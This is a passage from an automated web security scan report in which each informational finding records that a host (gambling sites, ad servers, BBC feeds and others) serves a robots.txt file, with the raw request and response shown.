Accept-Ranges: bytes
ETag: "b6facdd547b9cb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:32:28 GMT
Connection: close
Content-Length: 28

User-agent: *
Disallow: /

23.18. http://de.winnings.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://de.winnings.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: de.winnings.com

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/plain; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
ETag: ""
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.13
Set-Cookie: WinningsSID=l7emqegl7b31i4oav7c9k9a893; path=/; domain=.winnings.com
Set-Cookie: qtrans_cookie_test=qTranslate+Cookie+Test; path=/; domain=winnings.com
Set-Cookie: winnings[sessionId]=103122875; path=/; domain=.winnings.com
Set-Cookie: winnings[vid]=540261; expires=Tue, 15-May-2012 12:00:29 GMT; path=/; domain=.winnings.com
X-Pingback: http://winnings.com/xmlrpc.php
Date: Mon, 16 May 2011 12:00:29 GMT
Connection: close
Content-Length: 24

User-agent: *
Disallow:

23.19. http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://download.macromedia.com
Path:	/pub/shockwave/cabs/flash/swflash.cab

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: download.macromedia.com

Response

HTTP/1.0 200 OK
Server: Apache/2.0.52 (Unix)
Last-Modified: Wed, 09 Nov 2005 18:44:30 GMT
ETag: "1c91-1a-474d7f80"
Accept-Ranges: bytes
Content-Length: 26
Content-Type: text/plain
Date: Mon, 16 May 2011 11:46:24 GMT
Connection: close

User-agent: *
Disallow: /

23.20. https://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://download.macromedia.com
Path:	/pub/shockwave/cabs/flash/swflash.cab

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: download.macromedia.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Wed, 09 Nov 2005 18:44:30 GMT
ETag: "2a203d-1a-474d7f80"
Accept-Ranges: bytes
Content-Length: 26
Content-Type: text/plain
Date: Mon, 16 May 2011 12:39:57 GMT
Connection: close

User-agent: *
Disallow: /

23.21. http://download.neogames-tech.com/Brands/MundiRasca/Website/General/BottomMenuBG.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://download.neogames-tech.com
Path:	/Brands/MundiRasca/Website/General/BottomMenuBG.jpg

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: download.neogames-tech.com

Response

HTTP/1.1 200 OK
Content-Length: 28
Content-Type: text/plain
Last-Modified: Mon, 27 Jul 2009 12:44:56 GMT
Accept-Ranges: bytes
ETag: "347f77bb8eca1:d66"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:37:56 GMT
Connection: close

User-agent: *
Disallow: /

23.22. https://download.neogames-tech.com/chat/chatstart.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://download.neogames-tech.com
Path:	/chat/chatstart.aspx

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: download.neogames-tech.com

Response

HTTP/1.1 200 OK
Content-Length: 28
Content-Type: text/plain
Last-Modified: Mon, 27 Jul 2009 12:44:56 GMT
Accept-Ranges: bytes
ETag: "347f77bb8eca1:d66"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:57:17 GMT
Connection: close

User-agent: *
Disallow: /

23.23. http://el.crazyscratch.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://el.crazyscratch.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: el.crazyscratch.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Fri, 21 Jan 2011 08:47:41 GMT
Accept-Ranges: bytes
ETag: "beb724dd47b9cb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:31:41 GMT
Connection: close
Content-Length: 28

User-agent: *
Disallow: /

23.24. http://el.winnings.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://el.winnings.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: el.winnings.com

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/plain; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
ETag: ""
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.13
Set-Cookie: WinningsSID=hlpfug4hs08levtjg01pme3sr4; path=/; domain=.winnings.com
Set-Cookie: qtrans_cookie_test=qTranslate+Cookie+Test; path=/; domain=winnings.com
Set-Cookie: winnings[sessionId]=103123010; path=/; domain=.winnings.com
Set-Cookie: winnings[vid]=540394; expires=Tue, 15-May-2012 12:09:00 GMT; path=/; domain=.winnings.com
X-Pingback: http://winnings.com/xmlrpc.php
Date: Mon, 16 May 2011 12:09:00 GMT
Connection: close
Content-Length: 24

User-agent: *
Disallow:

23.25. http://en.crazyscratch.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://en.crazyscratch.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: en.crazyscratch.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Fri, 21 Jan 2011 08:47:49 GMT
Accept-Ranges: bytes
ETag: "9a6eabe147b9cb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:44:29 GMT
Connection: close
Content-Length: 28

User-agent: *
Disallow: /

23.26. http://es.crazyscratch.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://es.crazyscratch.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: es.crazyscratch.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Fri, 21 Jan 2011 08:47:54 GMT
Accept-Ranges: bytes
ETag: "68d1f9e447b9cb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:35:38 GMT
Connection: close
Content-Length: 28

User-agent: *
Disallow: /

23.27. http://es.winnings.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://es.winnings.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: es.winnings.com

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/plain; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
ETag: ""
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.13
Set-Cookie: WinningsSID=ap8djuc350n7b7mh3e9v4t94f6; path=/; domain=.winnings.com
Set-Cookie: qtrans_cookie_test=qTranslate+Cookie+Test; path=/; domain=winnings.com
Set-Cookie: winnings[sessionId]=103123533; path=/; domain=.winnings.com
Set-Cookie: winnings[vid]=540908; expires=Tue, 15-May-2012 12:32:31 GMT; path=/; domain=.winnings.com
X-Pingback: http://winnings.com/xmlrpc.php
Date: Mon, 16 May 2011 12:32:32 GMT
Connection: close
Content-Length: 24

User-agent: *
Disallow:

23.28. http://feeds.bbci.co.uk/news/rss.xml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://feeds.bbci.co.uk
Path:	/news/rss.xml

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: feeds.bbci.co.uk

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Thu, 24 Feb 2011 17:32:01 GMT
Content-Length: 464
Content-Type: text/plain
Cache-Control: max-age=1615
Expires: Mon, 16 May 2011 13:12:23 GMT
Date: Mon, 16 May 2011 12:45:28 GMT
Connection: close

User-agent: *
Disallow: /cgi-bin
Disallow: /cgi-perl
Disallow: /lexaurus
Disallow: /mpapps
Disallow: /mpsearch
Disallow: /mtk
Disallow: /weatherbeta
Disallow: /weather/hi/about/newsid_7760000/7
...[SNIP]...

23.29. http://fi.crazyscratch.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://fi.crazyscratch.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: fi.crazyscratch.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Fri, 21 Jan 2011 08:48:05 GMT
Accept-Ranges: bytes
ETag: "3afc5aeb47b9cb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:32:07 GMT
Connection: close
Content-Length: 28

User-agent: *
Disallow: /

23.30. http://fi.winnings.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://fi.winnings.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: fi.winnings.com

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/plain; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
ETag: ""
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.13
Set-Cookie: WinningsSID=19b2tcaoa11llcdu2rsbmpv1i1; path=/; domain=.winnings.com
Set-Cookie: qtrans_cookie_test=qTranslate+Cookie+Test; path=/; domain=winnings.com
Set-Cookie: winnings[sessionId]=103123064; path=/; domain=.winnings.com
Set-Cookie: winnings[vid]=540443; expires=Tue, 15-May-2012 12:11:14 GMT; path=/; domain=.winnings.com
X-Pingback: http://winnings.com/xmlrpc.php
Date: Mon, 16 May 2011 12:11:14 GMT
Connection: close
Content-Length: 24

User-agent: *
Disallow:

23.31. http://fpdownload.macromedia.com/pub/shockwave/cabs/flash/swflash.cab previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://fpdownload.macromedia.com
Path:	/pub/shockwave/cabs/flash/swflash.cab

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: fpdownload.macromedia.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Wed, 09 Nov 2005 18:44:30 GMT
ETag: "2a203d-1a-474d7f80"
Accept-Ranges: bytes
Content-Length: 26
Content-Type: text/plain
Date: Mon, 16 May 2011 12:01:28 GMT
Connection: close

User-agent: *
Disallow: /

23.32. http://fr.crazyscratch.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://fr.crazyscratch.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: fr.crazyscratch.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Fri, 21 Jan 2011 08:48:10 GMT
Accept-Ranges: bytes
ETag: "bc23aeee47b9cb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:25:17 GMT
Connection: close
Content-Length: 28

User-agent: *
Disallow: /

23.33. http://fr.winnings.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://fr.winnings.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: fr.winnings.com

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/plain; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
ETag: ""
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.13
Set-Cookie: WinningsSID=2pn1lo6l06jkpa2geu5suvq3n6; path=/; domain=.winnings.com
Set-Cookie: qtrans_cookie_test=qTranslate+Cookie+Test; path=/; domain=winnings.com
Set-Cookie: winnings[sessionId]=103123306; path=/; domain=.winnings.com
Set-Cookie: winnings[vid]=540683; expires=Tue, 15-May-2012 12:26:50 GMT; path=/; domain=.winnings.com
X-Pingback: http://winnings.com/xmlrpc.php
Date: Mon, 16 May 2011 12:26:51 GMT
Connection: close
Content-Length: 24

User-agent: *
Disallow:

23.34. http://getclicky.com/66384109 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://getclicky.com
Path:	/66384109

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: getclicky.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:45:22 GMT
Server: Apache
Last-Modified: Thu, 24 May 2007 00:06:48 GMT
ETag: "958ba1-1f-4312c0f11f600"
Accept-Ranges: bytes
Content-Length: 31
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /stats/

23.35. http://gmpg.org/xfn/11 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://gmpg.org
Path:	/xfn/11

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: gmpg.org

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 11:46:24 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.7a mod_bwlimited/1.4
Last-Modified: Tue, 01 Feb 2005 10:15:39 GMT
ETag: "b240f0-19-3ef0a6a1b08c0"
Accept-Ranges: bytes
Content-Length: 25
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

23.36. http://go.microsoft.com/fwlink/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://go.microsoft.com
Path:	/fwlink/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: go.microsoft.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Thu, 27 Oct 2005 18:42:43 GMT
Accept-Ranges: bytes
ETag: "a03b9f3726dbc51:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:45:12 GMT
Connection: keep-alive
Content-Length: 80

# Robots.txt file for http://go.microsoft.com
#

User-agent: *
Disallow: /

23.37. http://it.crazyscratch.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://it.crazyscratch.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: it.crazyscratch.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Fri, 21 Jan 2011 08:48:22 GMT
Accept-Ranges: bytes
ETag: "1ad556f547b9cb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:32:30 GMT
Connection: close
Content-Length: 28

User-agent: *
Disallow: /

23.38. http://itunes.apple.com/us/app/pclottery/id399201446 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://itunes.apple.com
Path:	/us/app/pclottery/id399201446

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: itunes.apple.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Thu, 12 May 2011 14:44:51 GMT
ETag: "d1-4a3153b528b57"
Accept-Ranges: bytes
Content-Length: 209
Content-Type: text/plain
Cache-Control: public, no-transform, max-age=2258
Date: Mon, 16 May 2011 12:13:11 GMT
Connection: close
X-Apple-Partner: origin.0

User-agent: *
Disallow: /WebObjects/MZFastFinance.woa
Disallow: /WebObjects/MZFinance.woa
Disallow: /WebObjects/MZPersonalizer.woa
Disallow: /WebObjects/MZSidebar.woa
Disallow: /WebObjects/MZStoreElem
...[SNIP]...

23.39. http://jquery.org/license previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://jquery.org
Path:	/license

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: jquery.org

Response

HTTP/1.0 200 OK
Date: Mon, 16 May 2011 12:32:16 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
X-Pingback: http://jquery.org/xmlrpc.php
Content-Length: 24
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:

23.40. http://leandrovieira.com/projects/jquery/lightbox/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://leandrovieira.com
Path:	/projects/jquery/lightbox/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: leandrovieira.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:35:42 GMT
Server: Apache
X-Pingback: http://leandrovieira.com/xmlrpc.php
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:

23.41. http://m.xp1.ru4.com/ad previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://m.xp1.ru4.com
Path:	/ad

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: m.xp1.ru4.com

Response

23.42. http://newsrss.bbc.co.uk/rss/newsonline_world_edition/front_page/rss.xml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://newsrss.bbc.co.uk
Path:	/rss/newsonline_world_edition/front_page/rss.xml

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: newsrss.bbc.co.uk

Response

HTTP/1.0 200 OK
Last-Modified: Tue, 17 Mar 2009 16:14:11 GMT
Server: Apache
Content-Length: 26
Content-Type: text/plain
Cache-Control: max-age=83052804
Expires: Wed, 01 Jan 2014 18:58:51 GMT
Date: Mon, 16 May 2011 12:45:27 GMT
Connection: close

User-agent: *
Disallow: /

23.43. http://nl.crazyscratch.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://nl.crazyscratch.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: nl.crazyscratch.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Fri, 21 Jan 2011 08:48:27 GMT
Accept-Ranges: bytes
ETag: "3473a0f847b9cb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:35:17 GMT
Connection: close
Content-Length: 28

User-agent: *
Disallow: /

23.44. http://nl.winnings.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://nl.winnings.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: nl.winnings.com

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/plain; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
ETag: ""
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.13
Set-Cookie: WinningsSID=doqfealogfg6lt09dspfie0qd4; path=/; domain=.winnings.com
Set-Cookie: qtrans_cookie_test=qTranslate+Cookie+Test; path=/; domain=winnings.com
Set-Cookie: winnings[sessionId]=103123222; path=/; domain=.winnings.com
Set-Cookie: winnings[vid]=540599; expires=Tue, 15-May-2012 12:24:40 GMT; path=/; domain=.winnings.com
X-Pingback: http://winnings.com/xmlrpc.php
Date: Mon, 16 May 2011 12:24:40 GMT
Connection: close
Content-Length: 24

User-agent: *
Disallow:

23.45. http://no.crazyscratch.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://no.crazyscratch.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: no.crazyscratch.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Fri, 21 Jan 2011 08:48:39 GMT
Accept-Ranges: bytes
ETag: "4e987dff47b9cb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:30:37 GMT
Connection: close
Content-Length: 28

User-agent: *
Disallow: /

23.46. http://no.winnings.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://no.winnings.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: no.winnings.com

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/plain; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
ETag: ""
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.13
Set-Cookie: WinningsSID=smc59lrfc16srv72eal206nhe1; path=/; domain=.winnings.com
Set-Cookie: qtrans_cookie_test=qTranslate+Cookie+Test; path=/; domain=winnings.com
Set-Cookie: winnings[sessionId]=103123219; path=/; domain=.winnings.com
Set-Cookie: winnings[vid]=540596; expires=Tue, 15-May-2012 12:24:34 GMT; path=/; domain=.winnings.com
X-Pingback: http://winnings.com/xmlrpc.php
Date: Mon, 16 May 2011 12:24:34 GMT
Connection: close
Content-Length: 24

User-agent: *
Disallow:

23.47. http://pagead2.googlesyndication.com/pagead/imgad previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pagead2.googlesyndication.com
Path:	/pagead/imgad

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: pagead2.googlesyndication.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Date: Mon, 16 May 2011 12:49:49 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block

User-Agent: *
Allow: /ads/preferences/
Disallow: /
Noindex: /

23.48. http://pixel.invitemedia.com/data_sync previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.invitemedia.com
Path:	/data_sync

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: pixel.invitemedia.com

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Mon, 16 May 2011 12:52:09 GMT
Content-Type: text/plain
Content-Length: 26

User-agent: *
Disallow: /

23.49. http://pixel.quantserve.com/pixel previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.quantserve.com
Path:	/pixel

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: pixel.quantserve.com

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: private, no-transform, must-revalidate, max-age=86400
Expires: Tue, 17 May 2011 12:49:40 GMT
Content-Type: text/plain
Content-Length: 26
Date: Mon, 16 May 2011 12:49:40 GMT
Server: QS

User-agent: *
Disallow: /

23.50. http://pt.crazyscratch.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pt.crazyscratch.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: pt.crazyscratch.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Fri, 21 Jan 2011 08:48:43 GMT
Accept-Ranges: bytes
ETag: "72ef1d248b9cb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:20:30 GMT
Connection: close
Content-Length: 28

User-agent: *
Disallow: /

23.51. http://pt.winnings.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pt.winnings.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: pt.winnings.com

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/plain; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
ETag: ""
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.13
Set-Cookie: WinningsSID=9ueg9jaeq5mfskpfc0obhjtf96; path=/; domain=.winnings.com
Set-Cookie: qtrans_cookie_test=qTranslate+Cookie+Test; path=/; domain=winnings.com
Set-Cookie: winnings[sessionId]=103123207; path=/; domain=.winnings.com
Set-Cookie: winnings[vid]=540584; expires=Tue, 15-May-2012 12:24:22 GMT; path=/; domain=.winnings.com
X-Pingback: http://winnings.com/xmlrpc.php
Date: Mon, 16 May 2011 12:24:23 GMT
Connection: close
Content-Length: 24

User-agent: *
Disallow:

23.52. http://pubads.g.doubleclick.net/pagead/adview previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pubads.g.doubleclick.net
Path:	/pagead/adview

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: pubads.g.doubleclick.net

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Date: Mon, 16 May 2011 12:52:11 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block

User-Agent: *
Allow: /ads/preferences/
Disallow: /
Noindex: /

23.53. http://s.mcstatic.com/Images/Studios/videogame/ChannelLogo.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://s.mcstatic.com
Path:	/Images/Studios/videogame/ChannelLogo.jpg

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: s.mcstatic.com

Response

HTTP/1.0 200 OK
Server: Apache
Content-Length: 514
Content-Type: text/plain
Date: Mon, 16 May 2011 12:49:29 GMT
Connection: close

User-agent: *
Disallow: /account/
Disallow: /bourne/mashup/?id=
Disallow: /bourne/mixer/?id=
Disallow: /disclaimer
Disallow: /f/
Disallow: /family_filter
Disallow: /fplayer/
Disallow: /invitat
...[SNIP]...

23.54. http://s0.2mdn.net/879366/flashwrite_1_2.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://s0.2mdn.net
Path:	/879366/flashwrite_1_2.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: s0.2mdn.net

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT
Date: Mon, 16 May 2011 00:01:58 GMT
Expires: Tue, 17 May 2011 00:01:58 GMT
X-Content-Type-Options: nosniff
Server: sffe
Content-Length: 28
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=86400
Age: 44009

User-agent: *
Disallow: /

23.55. http://s1.mcstatic.com/JS12/Home/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://s1.mcstatic.com
Path:	/JS12/Home/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: s1.mcstatic.com

Response

HTTP/1.0 200 OK
Server: Apache
Content-Length: 514
Content-Type: text/plain
Date: Mon, 16 May 2011 12:49:27 GMT
Connection: close

User-agent: *
Disallow: /account/
Disallow: /bourne/mashup/?id=
Disallow: /bourne/mixer/?id=
Disallow: /disclaimer
Disallow: /f/
Disallow: /family_filter
Disallow: /fplayer/
Disallow: /invitat
...[SNIP]...

23.56. http://s3.mcstatic.com/thumb/6373642/18140891/4/videos/2/1/the_cleveland_show_karate_season_2.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://s3.mcstatic.com
Path:	/thumb/6373642/18140891/4/videos/2/1/the_cleveland_show_karate_season_2.jpg

23.60. http://scratch.co.uk/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://scratch.co.uk
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: scratch.co.uk

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 11:41:34 GMT
Server: Apache
Last-Modified: Mon, 20 Sep 2010 12:57:00 GMT
Accept-Ranges: bytes
Content-Length: 34
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /logging/

23.61. http://spe.atdmt.com/ds/AAAVEWEWAWWA/20110413_WWA_Sp11_X1_NewCreative/WWA_Sp11_X1_Online_Fingertips_300x250.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://spe.atdmt.com
Path:	/ds/AAAVEWEWAWWA/20110413_WWA_Sp11_X1_NewCreative/WWA_Sp11_X1_Online_Fingertips_300x250.gif

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: spe.atdmt.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Content-Length: 68
Allow: GET
Expires: Wed, 18 May 2011 03:45:10 GMT
Date: Mon, 16 May 2011 12:52:12 GMT
Connection: close

User-agent: *
Disallow: /

User-Agent: AdsBot-Google
Disallow:

23.62. http://static.ak.fbcdn.net/connect/xd_proxy.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/connect/xd_proxy.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: static.ak.fbcdn.net

Response

HTTP/1.0 200 OK
Content-Type: text/plain;charset=utf-8
X-FB-Server: 10.138.17.185
Date: Mon, 16 May 2011 12:49:44 GMT
Content-Length: 2553
Connection: close

# Notice: if you would like to crawl Facebook you can
# contact us here: http://www.facebook.com/apps/site_scraping_tos.php
# to apply for white listing. Our general terms are available
# at http://ww
...[SNIP]...

23.63. http://sv.crazyscratch.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sv.crazyscratch.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: sv.crazyscratch.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Fri, 21 Jan 2011 08:48:48 GMT
Accept-Ranges: bytes
ETag: "8b64f548b9cb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:45:23 GMT
Connection: close
Content-Length: 28

User-agent: *
Disallow: /

23.64. http://sv.winnings.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sv.winnings.com
